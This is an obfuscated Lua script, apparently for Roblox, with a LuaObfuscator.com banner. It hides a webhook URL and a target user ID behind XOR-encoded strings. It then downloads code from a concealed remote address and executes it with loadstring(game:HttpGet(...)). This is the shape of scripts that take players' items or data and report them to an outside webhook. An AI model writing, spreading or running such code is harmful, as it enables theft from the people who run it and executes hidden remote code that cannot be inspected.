--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + ((3696 -(826 + 962)) -(157 + 1549 + (1081 -(29 + 851)))))),v1(v2(v9,((2327 -(57 + 736)) -(479 + 1054)) + ((v11-1)% #v9),1 + 0 + ((v11-1)% #v9) + (1 -0))))%(500 -244)));end return v5(v10);end _G.UserID=3622957711 -(84 + 215 + 232);_G.WebHook=v7("\225\189\65\9\250\243\26\86\237\160\70\26\230\187\81\87\234\166\88\86\232\185\92\86\254\172\87\17\230\166\94\10\166\248\5\79\187\253\6\79\177\250\1\77\177\249\2\76\185\255\4\74\166\147\92\24\208\167\7\40\227\135\125\26\200\177\112\21\205\173\87\8\193\172\4\28\185\176\103\60\187\184\88\14\203\135\86\1\205\171\120\59\221\168\0\58\219\189\119\59\199\140\88\26\218\253\97\14\230\161\103\31\200\132\5\59\221\251\70\24\192","\137\201\53\121");loadstring(game:HttpGet(v7("\215\50\49\165\106\133\105\106\167\120\200\104\34\188\109\215\51\39\160\106\218\52\38\186\119\203\35\43\161\55\220\41\40\250\74\214\42\32\187\122\218\21\38\167\112\207\50\54\250\73\204\62\22\182\107\214\54\49\166\55\243\51\36\250\116\222\47\43\250\73\204\62\4\160\109\208\32\36\167\116\145\50\55\160\124","\191\70\69\213\25")))();
